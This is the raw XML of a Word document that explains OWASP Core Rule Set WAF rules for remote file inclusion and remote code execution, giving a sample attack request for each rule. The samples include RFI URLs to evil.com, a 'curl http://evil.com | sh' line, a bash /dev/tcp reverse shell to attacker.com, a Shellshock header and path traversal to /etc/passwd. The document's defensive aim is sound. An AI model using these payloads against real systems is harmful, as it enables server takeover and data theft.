    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>GET /?page=http://192.168.1.5/shell.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>931110 – Common RFI Parameter with URL Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Goal: Detect RFI patterns when they’re paired with parameters often used in inclusions: e.g., template, file, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="009B6A89" w:rsidP="00C10D21">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>GET /?template=https://evil.com/shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21"/>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t xml:space="preserve">931120 – URL Payload with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Trailing ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t xml:space="preserve">Goal: Detect attempts to embed remote file </w:t>
      </w:r>
      <w:r w:rsidR="009B6A89">
        <w:t xml:space="preserve">and obfuscate using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009B6A89">
        <w:t>trailing ?.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>GET /?page=http://evil.com/shell.txt?</w:t>
      </w:r>
      <w:r w:rsidR="009B6A89">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>931130 – Off-Domain Reference/Link (PL2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Goal: For stricter paranoia settings, blocks off-domain remote inclusion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when domain differs from host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t xml:space="preserve">Only active when: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pa</w:t>
      </w:r>
      <w:r>
        <w:t>ranoia_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;= 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10D21" w:rsidRDefault="00C10D21" w:rsidP="00C10D21">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="00C10D21" w:rsidP="0032114D">
      <w:r>
        <w:t>GET /?page=https://malicious-site.com/payload</w:t>
      </w:r>
      <w:r w:rsidR="009B6A89">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009B6A89">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0032114D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0032114D">
        <w:t>Remote Code Execution (RCE) is a critical web vulnerability that allows an attacker to remotely run arbitrary code on the server. This can lead to complete system compromise, including:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Unauthorized data access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Malware installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Server takeover</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve">RCE vulnerabilities typically result from insecure handling of user input in functions that execute commands or evaluate code (e.g.,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), exec(), system()).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>http://example.com/page.php?cmd=whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Phase Definitions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Phase 1 (Request Headers): Paranoia-level checks control whether RCE detection rules run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Phase 2 (Request Body): Core RCE detection happens here. This phase inspects headers, parameters, cookies, and body content for RCE patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Phase 5 (Logging): Records triggered RCE rules, anomaly scores, and potential block actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRPr="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032114D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phase 1 – Paranoia Control Rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Rule ID: 932011 – Skip All RCE Rules if PL &lt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Rule ID: 932013 – Skip PL2 RCE Rules if PL &lt; 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Rule ID: 932015 – Skip PL3 RCE Rules if PL &lt; 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Rule ID: 932017 – Skip PL4 RCE Rules if PL &lt; 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRPr="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032114D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phase 2 – Core RCE Detection Rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>All of the following rules run in Phase 2, analyzing input like ARGS, HEADERS, COOKIES, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve">Rule ID </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">932100 – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Detects common Unix shell injection (e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, |, &amp;&amp;, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backticks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>;cat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br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>932105 – Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Obfuscated Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Catch command injection with encoding, quotes, spaces.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=$(ls%20-la)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve"> 932110 – Windows Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Detect use of Windows shell commands (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, type, cmd.exe)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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> C:\Windows\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve"> 932115 – Windows Obfuscated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Matches encoded, mixed-case, or separated Windows command syntax.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?input=%63%6d%64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve"> 932120 – PowerShell Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Detect PowerShell keywords (Invoke-Expression, Start-Process)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=Invoke-Expression 'Get-Process'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>932130 – Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Shell Expressions / Known CVEs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve">Goal: Detects curl, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, piping into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, CVE payloads (e.g., Text4Shell)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 xml:space="preserve">=curl http://evil.com | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve"> 932140 – Windows Script Injection (FOR/IF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Detects scr</w:t>
      </w:r>
      <w:r>
        <w:t>ipting logic like FOR, IF loops</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:lastRenderedPageBreak/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=FOR /L %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IN (1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,1,10</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) DO echo %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve"> 932150 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Backtick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Shell Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve">Goal: Detects </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>acktick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-executed shell commands</w:t>
      </w:r>
    </w:p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=`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a`</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>932160 – Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Shell Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Detects shell-based obfuscation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using bash, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, chaining</w:t>
      </w:r>
    </w:p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=/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;&amp; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/attacker.com/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D"/>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve"> 932170 / 932171 – Shellshock Exploit in Headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Match headers carr</w:t>
      </w:r>
      <w:r>
        <w:t>ying legacy Shellshock payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve">User-Agent: () </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>; }; echo vulnerable</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t xml:space="preserve"> 932180 – Executable File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Goal: Prevent uploading files with dangerou</w:t>
      </w:r>
      <w:r>
        <w:t>s extensions (e.g., .exe, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Triggers: Content-Disposition headers with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blocked extensions in filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032114D" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A02E3" w:rsidRDefault="0032114D" w:rsidP="0032114D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Content-Disposition: form-data; name="upload"; filename="shell.exe"</w:t>
      </w:r>
      <w:r w:rsidR="001F1A31">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001F1A31">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001F1A31" w:rsidRPr="001F1A31">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10273166" wp14:editId="68A9A058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CD"/>
    <w:rsid w:val="000E0721"/>
    <w:rsid w:val="001F1A31"/>
    <w:rsid w:val="00305307"/>
    <w:rsid w:val="0032114D"/>
    <w:rsid w:val="007A02E3"/>
    <w:rsid w:val="008E72AB"/>
    <w:rsid w:val="009B6A89"/>
    <w:rsid w:val="00AD282E"/>
    <w:rsid w:val="00C10D21"/>
    <w:rsid w:val="00CA6DBB"/>
    <w:rsid w:val="00F551E5"/>
    <w:rsid w:val="00F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65E0-157E-47F4-8678-6349F80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3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943C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0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example.com/index.php?page=http://attacker.com/shell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xample.com/index.php?page=../../../../etc/passw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xample.com/index.php?page=about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2025-07-08T16:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-09T04:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>